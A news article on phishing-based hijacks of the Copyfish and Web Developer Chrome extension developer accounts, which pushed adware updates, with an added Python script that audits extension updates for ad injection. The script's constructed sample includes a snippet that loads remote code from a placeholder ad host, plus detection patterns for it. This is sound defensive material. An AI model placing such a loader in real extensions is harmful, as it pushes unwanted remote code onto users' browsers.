Compromised accounts push fraudulent extension updates to unsuspecting users.

Twice in five days, developers of Chrome browser extensions have lost control of their code after unidentified attackers compromised the Google Chrome Web Store accounts used to issue updates.

The most recent case happened Wednesday to Chris Pederick, creator of the Web Developer extension. Last Friday, developers of Copyfish, a browser extension that performs optical character recognition, also had their account hijacked.

In both cases, the attackers used the unauthorized access to publish fraudulent updates that by default are automatically pushed to all Chrome users who have the extensions installed. The tainted extensions were also available for download in Google's official Chrome Web Store. Both Pederick and the Copyfish developers said the fraudulent updates did nothing more than inject ads into the sites users visited. The Copyfish developers published an account of the incident that included a side-by-side comparison of the legitimate and altered code. Pederick has so far not provided documentation of the changes that were pushed out to the more than one million browsers that have downloaded the Web Developer extension.
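The side-by-side comparison the Copyfish developers published is the kind of check any extension author or cautious user can automate before an update reaches them. The following Python script is an added example written for this article, not code from Ars, Google, Copyfish or Web Developer. It diffs a hypothetical "before" and "after" manifest.json and content script (both constructed here and labelled as such) and flags the additions that an ad-injecting update typically needs: broadened permissions, new content-script matches, new script files, newly referenced remote hosts, and a runtime script-loader pattern. The sample hostnames and file names are invented placeholders.

```python
"""Audit a Chrome extension update for the additions an ad-injecting
update typically introduces (added example; the manifests below are
constructed for illustration and are not any real extension's code)."""
import json
import re

# Constructed "before" manifest: narrow host match, minimal permissions.
OLD_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "Example OCR Helper",
    "version": "2.8.4",
    "permissions": ["activeTab", "storage"],
    "content_scripts": [
        {"matches": ["https://*.example.org/*"], "js": ["ocr.js"]},
    ],
})

# Constructed "after" manifest: the update now runs on every site.
NEW_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "Example OCR Helper",
    "version": "2.8.5",
    "permissions": ["activeTab", "storage", "tabs", "<all_urls>"],
    "content_scripts": [
        {"matches": ["https://*.example.org/*"], "js": ["ocr.js"]},
        {"matches": ["<all_urls>"], "js": ["inject.js"], "run_at": "document_end"},
    ],
})

# Constructed content scripts: the "after" version appends a remote <script>.
OLD_JS = "fetch('https://api.example.org/ocr').then(r => r.json());\n"
NEW_JS = (
    "fetch('https://api.example.org/ocr').then(r => r.json());\n"
    "var s = document.createElement('script');\n"
    "s.src = 'https://ads.example.invalid/loader.js';\n"
    "document.head.appendChild(s);\n"
)

# Hostnames referenced in code, and the runtime script-loader idiom.
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
LOADER_RE = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)")


def _matches(manifest):
    """All URL patterns the extension's content scripts run on."""
    return {m for cs in manifest.get("content_scripts", []) for m in cs.get("matches", [])}


def _scripts(manifest):
    """All JavaScript files injected by content scripts."""
    return {js for cs in manifest.get("content_scripts", []) for js in cs.get("js", [])}


def audit_update(old_manifest_json, new_manifest_json, old_js, new_js):
    """Return a list of findings describing risky additions in the update.

    Each finding is a plain string; an empty list means nothing new was added
    in the categories checked (it does not prove the update is benign)."""
    old, new = json.loads(old_manifest_json), json.loads(new_manifest_json)
    findings = []
    for perm in sorted(set(new.get("permissions", [])) - set(old.get("permissions", []))):
        findings.append(f"new permission: {perm}")
    for m in sorted(_matches(new) - _matches(old)):
        findings.append(f"new content_script match: {m}")
    for js in sorted(_scripts(new) - _scripts(old)):
        findings.append(f"new content script file: {js}")
    for host in sorted(set(URL_RE.findall(new_js)) - set(URL_RE.findall(old_js))):
        findings.append(f"new remote host referenced in code: {host}")
    if LOADER_RE.search(new_js) and not LOADER_RE.search(old_js):
        findings.append("code now creates <script> elements at runtime (remote loader pattern)")
    return findings


if __name__ == "__main__":
    for finding in audit_update(OLD_MANIFEST, NEW_MANIFEST, OLD_JS, NEW_JS):
        print("WARN", finding)
```

Run against the constructed samples, the script reports the jump to `<all_urls>`, the added `inject.js`, the new remote host and the runtime loader. In practice a developer would run this over the unpacked CRX of a published version against the source they actually shipped; a clean result only says these particular categories did not change.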

Converting a useful browser extension into adware is generally little more than an annoyance. Still, the incidents underscore a serious weakness in Chrome, which is widely regarded among security professionals as the safest browser to use. Previous abuse of the Google Chrome Web Store shows that criminals who can modify legitimate extension code can use that capability to take control of social media accounts, execute malicious code, and collect browsing histories and user data.

Low-hanging fruit

Google has poured hundreds of millions of dollars into fortifying the security of Chrome, making it resistant to the kinds of drive-by attacks that used to be common and still happen on occasion to competing browsers. But two Chrome extension account hijackings in five days suggest that extensions are one of the more effective ways attackers can target Chrome users.

In blog-post comments and in an e-mail to Ars, officials with Copyfish developer A9t9 Software said the account used to distribute the Chrome extension wasn't protected by two-factor authentication, which Google provides for free. (The A9t9 Software account now uses the added protection of two-factor authentication.) The account was compromised after a company employee clicked on a link in a phishing e-mail that purported to be from Google. Shortly after the employee entered the account password into the fraudulent Web page that appeared, the Copyfish account was taken over. A day later, the Copyfish extension was updated with the adware.

Chris Pederick, the developer of the Web Developer extension, said on Twitter that his account was also hijacked through phishing. He didn't respond to an e-mail seeking comment for this post.

A Google spokeswoman told Ars that two-factor authentication isn't mandatory for extension developers; she didn't respond to a follow-up question asking why the additional security is optional.

It's understandable that Google doesn't make two-factor authentication mandatory for all account holders. But given Chrome's track record with security, it's surprising that the company doesn't require the added protection for extension developers, who—because of their ability to push code onto millions of users' computers—represent high-value targets to criminals.

Truly security-conscious users should remember this limitation when deciding whether to install Chrome extensions.